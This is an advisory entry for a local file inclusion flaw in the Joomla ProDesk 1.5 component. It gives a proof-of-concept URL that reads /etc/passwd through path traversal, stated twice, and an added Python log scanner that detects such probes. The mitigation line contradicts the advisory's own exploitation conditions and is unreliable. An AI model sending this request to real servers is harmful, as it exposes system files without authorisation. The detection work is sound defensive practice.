Vendor: ProDesk
By: d3v1l [Avram Marius]
CVSS: 7.5 (HIGH)
Type: Local File Inclusion
CWE: 98
Product Name: ProDesk
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: NO
Related CWE: N/A
CPE: a:joomlashowroom:pro_desk
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2010

Joomla Component ProDesk v 1.5 (com_pro_desk&include_file) Local File Inclusion

Joomla Component ProDesk v 1.5 is vulnerable to Local File Inclusion through the include_file parameter of com_pro_desk. An attacker can exploit this vulnerability to include local files on the server. According to the original advisory, exploitation requires magic_quotes to be set to OFF and disable_functions to be set to ini_set.

PoC: http://site.com/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd

Mitigation:

Ensure that magic_quotes is set to ON and disable_functions is set to ini_set.
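
A detection check for the request pattern shown in the PoC, added here as an example (it is not part of the original advisory or of the ProDesk code): it scans web access-log lines for com_pro_desk requests whose include_file value contains path traversal or an absolute path, undoing repeated percent-encoding first. The log lines, the client addresses and the value ticket_form are constructed sample data, and the combined log format is an assumption.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (assumed combined log format); not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [07/Nov/2010:10:01:02 +0000] "GET /index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd HTTP/1.1" 200 1042
198.51.100.7 - - [07/Nov/2010:10:01:09 +0000] "GET /index.php?option=com_pro_desk&include_file=..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 200 311
203.0.113.20 - - [07/Nov/2010:10:02:40 +0000] "GET /index.php?option=com_pro_desk&include_file=ticket_form HTTP/1.1" 200 5120
203.0.113.20 - - [07/Nov/2010:10:03:11 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 8801
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_suspicious(value):
    """True if the value has a '..' path segment or is an absolute path."""
    v = fully_decode(value).replace("\\", "/")
    return ".." in v.split("/") or v.startswith("/")

def find_lfi_probes(log_text):
    """Return (client_ip, decoded include_file) for suspicious com_pro_desk hits."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if "com_pro_desk" not in params.get("option", []):
            continue
        for raw in params.get("include_file", []):
            if is_suspicious(raw):
                hits.append((client, fully_decode(raw)))
    return hits

if __name__ == "__main__":
    for client, value in find_lfi_probes(SAMPLE_LOG):
        print(client, value)
```

Any hit is worth triage regardless of the HTTP status code, since a 200 response alone does not show whether the file was actually included.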

Exploit-DB raw data:

[~]-------------------------------------------------------------------------------------------------------
[~] Joomla Component ProDesk v 1.5 (com_pro_desk&include_file) Local File Inclusion  
[~]
[~] http://joomlashowroom.com
[~]  
[~] Price - $ 49.99
[~] ----------------------------------------------------------------------------------------------------
[~] Bug founded by d3v1l [Avram Marius]
[~]
[~] Date: 7.11.2010
[~]
[~] http://security-sh3ll.blogspot.com | http://twitter.com/securityshell
[~]
[~] -----------------------------------------------------------------------------------------------------
[~] Poc :-
[~]
[~] http://site.com/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd
[~]  
[~] Note :-
[~]
[~] Need: magic_quotes=OFF - Need: disable_functions=ini_set
[~]-------------------------------------------------------------------------------------------------------